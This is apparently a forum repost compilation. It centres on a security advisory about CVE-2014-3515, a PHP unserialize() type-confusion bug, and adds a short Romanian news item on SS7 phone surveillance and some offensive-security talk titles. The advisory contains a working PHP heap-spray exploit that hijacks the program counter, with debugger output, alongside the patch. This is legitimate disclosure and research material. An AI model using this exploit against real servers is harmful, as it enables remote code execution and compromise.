The dangers arising from this function are twofold. On the one hand, it allows instantiating classes that PHP knows about at the time of execution, which can sometimes be abused to execute arbitrary code, as demonstrated in our research Utilizing Code Reuse Or Return Oriented Programming In PHP Application Exploits presented at BlackHat USA 2010. On the other hand, there is the danger of memory corruption, type confusion or use-after-free vulnerabilities in the unserialize() function itself. The researchers of SektionEins have shown the existence of both types of problems again and again in the past.
During source code audits we perform for our customers we still see unserialize() being used on user input today, despite all the previous vulnerabilities in unserialize() and various examples of successful compromises through object injections. Research from other teams has even shown that the encryption and signing schemes people think up to protect serialized data often do not work and can be exploited.

In this post we will detail two type confusion vulnerabilities in the deserialization of SPL ArrayObject and SPL ObjectStorage objects that we disclosed to PHP.net, and show how they allow attackers to execute arbitrary code on the server. Both vulnerabilities have the CVE name CVE-2014-3515 assigned.

The Vulnerabilities

The vulnerabilities in question are located in the PHP source code in the file /ext/spl/spl_array.c inside SPL_METHOD(Array, unserialize) and in the file /ext/spl/spl_observer.c inside SPL_METHOD(SplObjectStorage, unserialize). The vulnerabilities are located in the handling of serialized object member variables.

[cpp]ALLOC_INIT_ZVAL(pmembers);
if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC)) {
	zval_ptr_dtor(&pmembers);
	goto outexcept;
}

/* copy members */
if (!intern->std.properties) {
	rebuild_object_properties(&intern->std);
}
zend_hash_copy(intern->std.properties, Z_ARRVAL_P(pmembers), (copy_ctor_func_t) zval_add_ref, (void *) NULL, sizeof(zval *));
zval_ptr_dtor(&pmembers);[/cpp]

The code above calls the deserializer to get the member variables from the serialized string and then copies them into the properties with the zend_hash_copy() function. The type confusion vulnerability here is that the code assumes that the deserialization returns a PHP array. This is however not checked and fully depends on the content of the serialized string. The result is then used via the Z_ARRVAL_P macro, which leads to various problems depending on what type of variable is actually returned by the deserializer.
To understand the problem in more detail let us look at the definition of a ZVAL (ignoring the GC version) and the Z_ARRVAL_P macro:

[cpp]typedef union _zvalue_value {
	long lval;				/* long value */
	double dval;			/* double value */
	struct {
		char *val;
		int len;
	} str;
	HashTable *ht;			/* hash table value */
	zend_object_value obj;
} zvalue_value;

struct _zval_struct {
	/* Variable information */
	zvalue_value value;		/* value */
	zend_uint refcount__gc;
	zend_uchar type;		/* active type */
	zend_uchar is_ref__gc;
};

#define Z_ARRVAL(zval)		(zval).value.ht
#define Z_ARRVAL_P(zval_p)	Z_ARRVAL(*zval_p)[/cpp]

As you can see from these definitions, accessing the Z_ARRVAL of a PHP variable will look up the pointer to a HashTable structure from the union zvalue_value. The HashTable structure is PHP's internal way to store array data. Because this is a union, for other variable types this pointer slot will be filled with different kinds of data. A PHP integer variable, for example, will have its value stored in the same position as the pointer of the PHP array variable (in case sizeof(long) == sizeof(void *)). The same is true for the value of floating point variables and the other variable types.

Let's look into what happens when the deserializer returns an integer (or maybe a double value for Win64): the value of the integer will be used as an in-memory pointer to a HashTable and its data will be copied over into another array. The following little POC code demonstrates this and will make the deserializer attempt to work on a HashTable starting at memory address 0x55555555. This should result in a crash, because it is usually an invalid memory position.

[phpcode]<?php
unserialize("C:11:\"ArrayObject\":28:{x:i:0;a:0:{};m:i:1431655765;});");
?>[/phpcode]

In case the memory address does point to a real HashTable structure, its content is copied over into the deserialized array object as its member variables.
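The union overlap can be demonstrated outside PHP with a few lines of C. This is an illustrative model, not PHP's real code: the typedef below is a cut-down, hypothetical stand-in for zvalue_value, and it assumes the LP64 case mentioned above, i.e. sizeof(long) == sizeof(void *).

```c
#include <stdint.h>

/* Cut-down stand-in for PHP's zvalue_value: the same bytes hold either a
 * long or a HashTable pointer, and only the zval's type byte says which
 * interpretation is valid. */
typedef union {
    long lval;   /* what an attacker-supplied integer zval stores */
    void *ht;    /* what Z_ARRVAL_P reads when the type check is missing */
} fake_zvalue_value;

/* Models Z_ARRVAL_P without an IS_ARRAY check: blindly reinterprets the
 * stored bits as a HashTable pointer. */
void *confused_arrval(fake_zvalue_value v)
{
    return v.ht;
}
```

Storing the serialized member value i:1431655765 and reading the pointer slot back yields, bit for bit, the address 0x55555555 that the engine then walks as a HashTable.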
This is useful in case the result of the deserialization is serialized again and returned to the user, which is a common pattern in applications exposing unserialize() to user input. The following PHP code is an example of this pattern.

[phpcode]<?php
$data = unserialize(base64_decode($_COOKIE['data']));
$data['visits']++;
setcookie("data", base64_encode(serialize($data)));
?>[/phpcode]

Whenever unserialize() is used in a similar way as above, vulnerabilities exposed through unserialize() can result in information leaks.

Digging Deeper

While integer variables allow us to interpret arbitrary memory positions as a HashTable, PHP's string variable type might be even more interesting for an attacker. When you look at the ZVAL structure above you will realize that the array's HashTable pointer is in the same position as a string's data pointer. This means that if the deserializer returns a string instead of an array, the content of the string will be accessed as if it were a HashTable. Let's have a look into what these HashTable structures are.

[cpp]typedef struct _hashtable {
	uint nTableSize;			/* current size of bucket space (power of 2) */
	uint nTableMask;			/* nTableSize - 1 for faster calculation */
	uint nNumOfElements;		/* current number of elements */
	ulong nNextFreeElement;		/* next free numerical index */
	Bucket *pInternalPointer;	/* used for element traversal */
	Bucket *pListHead;			/* head of double linked list of all elements in array */
	Bucket *pListTail;			/* tail of double linked list of all elements in array */
	Bucket **arBuckets;			/* hashtable bucket space */
	dtor_func_t pDestructor;	/* element destructor */
	zend_bool persistent;		/* marks hashtable lifetime as persistent */
	unsigned char nApplyCount;	/* required to stop endless recursions */
	zend_bool bApplyProtection;	/* required to stop endless recursions */
} HashTable;[/cpp]

PHP's HashTable structure is a mixture of the data structures hash table and double linked list.
This allows for fast element access but also allows traversing the elements of an array in order. The elements of the array are stored in so-called Buckets that either inline the data or provide a pointer to the actual data associated with a bucket. For every possible hash value the topmost bucket is addressed through a pointer from the bucket space. The bucket data structure is as follows:

[cpp]typedef struct bucket {
	ulong h;					/* Used for numeric indexing */
	uint nKeyLength;			/* 0 for numeric indices, otherwise length of string */
	void *pData;				/* address of the data */
	void *pDataPtr;				/* storage place for data if datasize == sizeof(void *) */
	struct bucket *pListNext;	/* next pointer in global linked list */
	struct bucket *pListLast;	/* prev pointer in global linked list */
	struct bucket *pNext;		/* next pointer in bucket linked list */
	struct bucket *pLast;		/* prev pointer in bucket linked list */
	char arKey[1];				/* Must be last element - recently changed to point to external array key */
} Bucket;[/cpp]

With those two data structures it is now possible to lay out a fake HashTable in the string that is passed to unserialize(), which itself points to a fake array in memory. Depending on the content of that fake array, the destruction of the just deserialized object at the end of the script will trigger the attacker-supplied (fake array) HashTable destructor, which gives the attacker control over the program counter. The first parameter to this destructor is a pointer to the pointer to the fake ZVAL supplied by the fake Bucket, which means a pivot gadget that moves the first function parameter into the stack pointer would be enough to start a ROP chain.

Proof of Concept Exploit

The following code was shared with the PHP developers on 20th June 2014. It is a POC that demonstrates program counter control from a PHP script. The POC was developed against a standard MacOSX 10.9.3 installation of PHP 5.4.24.
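The control-flow hijack that the fake HashTable enables can be modeled in a few lines of C. This is a deliberately simplified, hypothetical sketch (the struct below cuts PHP's real HashTable down to the two fields that matter here): the destruction path reads a function pointer, pDestructor, straight out of memory the attacker laid out, and calls it.

```c
#include <string.h>

/* Cut-down model of the attack surface: the engine trusts whatever
 * pDestructor it finds in the (fake) HashTable. Field names mirror the
 * structures quoted above; the layout is not PHP's real engine code. */
typedef void (*dtor_func_t)(void *);

typedef struct {
    unsigned nNumOfElements;
    dtor_func_t pDestructor;   /* attacker-chosen in the sprayed fake table */
} fake_hashtable;

/* Benign stand-in for the attacker's gadget, so the call can be observed. */
int gadget_calls = 0;
void benign_gadget(void *p) { (void)p; gadget_calls++; }

/* Stand-in for the engine's destruction path: it treats the supplied bytes
 * as a HashTable and invokes its element destructor. */
void destroy_like_engine(const unsigned char *mem, void *elem)
{
    fake_hashtable ht;
    memcpy(&ht, mem, sizeof ht);   /* "string bytes" parsed as a HashTable */
    if (ht.nNumOfElements > 0 && ht.pDestructor != 0)
        ht.pDestructor(elem);      /* program counter now attacker-chosen */
}
```

In the real exploit, pDestructor points at a stack-pivot gadget instead of a harmless function, which is exactly the controlled-RIP condition the lldb session below demonstrates.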
It works by first spraying the heap with a repeated pattern of fake hashtables, buckets and zvals and then triggers the malicious unserialize(). Keep in mind that a remote attacker could heap spray PHP installations by sending lots of POST data to the server and then pass a malicious string to a user input exposed unserialize().

[phpcode]<?php
/* Unserialize ArrayObject Type Confusion Exploit */
/* (C) Copyright 2014 Stefan Esser */

ini_set("memory_limit", -1);

if ($_SERVER['argc'] < 2) {
	$__PC__ = 0x504850111110;
} else {
	$__PC__ = $_SERVER['argv'][1] + 0;
}

// we assume that 0x111000000 is controlled by our heap spray
$base = 0x114000000 + 0x20;

echo "Setting up memory...\n";
setup_memory();

echo "Now performing exploit...\n";
$inner = 'x:i:0;a:0:{};m:s:'.strlen($hashtable).':"'.$hashtable.'";';
$exploit = 'C:11:"ArrayObject":'.strlen($inner).':{'.$inner.'}';
$z = unserialize($exploit);
unset($z);

function setup_memory()
{
	global $str, $hashtable, $base, $__PC__;

	// we need FAKE HASH TABLE / FAKE BUCKET / FAKE ZVAL
	$bucket_addr = $base;
	$zval_delta = 0x100;
	$hashtable_delta = 0x200;
	$zval_addr = $base + $zval_delta;
	$hashtable_addr = $base + $hashtable_delta;

	//typedef struct bucket {
	$bucket  = "\x01\x00\x00\x00\x00\x00\x00\x00";	// ulong h;
	$bucket .= "\x00\x00\x00\x00\x00\x00\x00\x00";	// uint nKeyLength = 0 => numerical index
	$bucket .= ptr2str($bucket_addr + 3*8);			// void *pData;
	$bucket .= ptr2str($zval_addr);					// void *pDataPtr;
	$bucket .= ptr2str(0);							// struct bucket *pListNext;
	$bucket .= ptr2str(0);							// struct bucket *pListLast;
	$bucket .= ptr2str(0);							// struct bucket *pNext;
	$bucket .= ptr2str(0);							// struct bucket *pLast;
	$bucket .= ptr2str(0);							// const char *arKey;
	//} Bucket;

	//typedef struct _hashtable {
	$hashtable  = "\x00\x00\x00\x00";				// uint nTableSize;
	$hashtable .= "\x00\x00\x00\x00";				// uint nTableMask;
	$hashtable .= "\x01\x00\x00\x00";				// uint nNumOfElements;
	$hashtable .= "\x00\x00\x00\x00";
	$hashtable .= "\x00\x00\x00\x00\x00\x00\x00\x00";	// ulong nNextFreeElement;
	$hashtable .= ptr2str(0);						// Bucket *pInternalPointer; /* Used for element traversal */
	$hashtable .= ptr2str($bucket_addr);			// Bucket *pListHead;
	$hashtable .= ptr2str(0);						// Bucket *pListTail;
	$hashtable .= ptr2str(0);						// Bucket **arBuckets;
	$hashtable .= ptr2str($__PC__);					// dtor_func_t pDestructor;
	$hashtable .= "\x00";							// zend_bool persistent;
	$hashtable .= "\x00";							// unsigned char nApplyCount;
													// zend_bool bApplyProtection;
	//} HashTable;

	//typedef union _zvalue_value {
	//	long lval;				/* long value */
	//	double dval;			/* double value */
	//	struct {
	//		char *val;
	//		int len;
	//	} str;
	//	HashTable *ht;			/* hash table value */
	//	zend_object_value obj;
	//} zvalue_value;
	//struct _zval_struct {
	//	/* Variable information */
	$zval  = ptr2str($hashtable_addr);				// zvalue_value value; /* value */
	$zval .= ptr2str(0);
	$zval .= "\x00\x00\x00\x00";					// zend_uint refcount__gc;
	$zval .= "\x04";								// zend_uchar type; /* active type */
	$zval .= "\x00";								// zend_uchar is_ref__gc;
	$zval .= ptr2str(0);
	$zval .= ptr2str(0);
	$zval .= ptr2str(0);
	//};

	/* Build the string */
	$part = str_repeat("\x73", 4096);
	for ($j=0; $j<strlen($bucket); $j++) {
		$part[$j] = $bucket[$j];
	}
	for ($j=0; $j<strlen($hashtable); $j++) {
		$part[$j+$hashtable_delta] = $hashtable[$j];
	}
	for ($j=0; $j<strlen($zval); $j++) {
		$part[$j+$zval_delta] = $zval[$j];
	}
	$str = str_repeat($part, 1024*1024*256/4096);
}

function ptr2str($ptr)
{
	$out = "";
	for ($i=0; $i<8; $i++) {
		$out .= chr($ptr & 0xff);
		$ptr >>= 8;
	}
	return $out;
}
?>[/phpcode]

You can then test the POC on the command line:

$ lldb php
Current executable set to 'php' (x86_64).
(lldb) run exploit.php 0x1122334455
There is a running process, kill it and restart?: [Y/n] y
Process 38336 exited with status = 9 (0x00000009)
Process 38348 launched: '/usr/bin/php' (x86_64)
Setting up memory...
Now performing exploit...
Process 38348 stopped
* thread #1: tid = 0x636867, 0x0000001122334455, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x1122334455)
    frame #0: 0x0000001122334455
error: memory read failed for 0x1122334400
(lldb) re re
General Purpose Registers:
       rax = 0x0000001122334455
       rbx = 0x0000000114000020
       rcx = 0x000000010030fd48  php`_zval_dtor_func + 160
       rdx = 0x0000000100d22050
       rdi = 0x0000000114000038
       rsi = 0x0000000000000000
       rbp = 0x00007fff5fbfe8b0
       rsp = 0x00007fff5fbfe888
        r8 = 0x0000000000000000
        r9 = 0x0000000000000008
       r10 = 0x0000000000000000
       r11 = 0x000000000000005b
       r12 = 0x0000000100956be8  php`executor_globals
       r13 = 0x0000000000000000
       r14 = 0x0000000114000220
       r15 = 0x0000000000000000
       rip = 0x0000001122334455  <----- controlled RIP
    rflags = 0x0000000000010206
        cs = 0x000000000000002b
        fs = 0x0000000000000000
        gs = 0x0000000022330000
(lldb) x/20x $rdi-0x18
0x114000020: 0x00000001 0x00000000 0x00000000 0x00000000
0x114000030: 0x14000038 0x00000001 0x14000120 0x00000001 <---- &pDataPtr
0x114000040: 0x00000000 0x00000000 0x00000000 0x00000000
0x114000050: 0x00000000 0x00000000 0x00000000 0x00000000
0x114000060: 0x00000000 0x00000000 0x73737373 0x73737373

The Fix

We shared our patches for these vulnerabilities with the PHP developers who have therefore released PHP 5.5.14, PHP 5.4.30 and PHP 5.3.29. If you are running any of these versions you do not need to apply the fix. If you are not you should make sure that you apply the following patchset.
--- php-5.5.13/ext/spl/spl_observer.c	2014-05-28 11:06:28.000000000 +0200
+++ php-5.5.13-unserialize-fixed/ext/spl/spl_observer.c	2014-06-20 17:54:33.000000000 +0200
@@ -898,7 +898,7 @@
 	++p;
 
 	ALLOC_INIT_ZVAL(pmembers);
-	if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC)) {
+	if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(pmembers) != IS_ARRAY) {
 		zval_ptr_dtor(&pmembers);
 		goto outexcept;
 	}
--- php-5.5.13/ext/spl/spl_array.c	2014-05-28 11:06:28.000000000 +0200
+++ php-5.5.13-unserialize-fixed/ext/spl/spl_array.c	2014-06-20 17:54:09.000000000 +0200
@@ -1789,7 +1789,7 @@
 	++p;
 
 	ALLOC_INIT_ZVAL(pmembers);
-	if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC)) {
+	if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(pmembers) != IS_ARRAY) {
 		zval_ptr_dtor(&pmembers);
 		goto outexcept;
 	}

Stefan Esser

Sursa: https://www.sektioneins.de/en/blog/14-08-27-unserialize-typeconfusion.html
-
Monitoring equipment for tracking mobile phones, available for anyone to rent or buy

Aurelian Mihai - 26 Aug 2014

Long considered a privilege reserved for wealthy countries, mass surveillance of mobile phone users is, apparently, within reach of any government or organization willing to buy or rent the necessary equipment and to obtain the cooperation of mobile carriers.

According to revelations made by The Washington Post, dozens of countries have already bought or rented surveillance equipment that allows mobile phones to be monitored anywhere in the world, the only condition being that the local carrier cooperates by tolerating such activities.

All of this is made possible by specialized software that exploits vulnerabilities in the SS7 protocol suite, deployed in 1993 and used without further changes for signaling in most of the world's telephone networks. Apparently, establishing a user's location requires nothing more than querying the telephone networks with the target's phone number. With enough queries repeated at different intervals, it is possible to locate the targeted person almost anywhere in the world and to track their movements step by step.

Going further, the system can be used in combination with other surveillance tools to intercept data traffic sent to and from the mobile phone and to pin down its exact location. Known as StingRays, interception devices originally intended for US authorities' surveillance missions have apparently ended up in the wrong hands and are currently being used to serve the interests of third parties and organizations.

Unfortunately, preventing abuse is difficult to put into practice as long as over 75% of networks accept location requests sent using the SS7 protocol and offer no means of effectively blocking abusive requests. A safer alternative to the SS7 system will only be ready within the next 10 years; in the meantime, the only defense is not disclosing your phone number and changing it periodically, preferably together with the phones used until then.

Sursa: Echipamente de monitorizare pentru urmărirea telefoanelor mobile, disponibile oricui pentru închiriere sau cumpărare
-
Job offer: Linux SYSADMIN, hosting company in Italy
Nytro replied to sdfantini's topic in Locuri de munca
@Cheater ? -
[h=1]OFFENSIVE: Exploiting DNS Servers Changes by Leonardo Nve[/h]
-
[h=1]Building Trojan Hardware at Home by JP Dunning[/h]
-
[h=1]PDF Attack: A Journey From the Exploit Kit to the Shellcode Part 1 by Jose Miguel Esparza[/h] [h=1]PDF Attack: A Journey From the Exploit Kit to the Shellcode Part 2 by Jose Miguel Esparza[/h]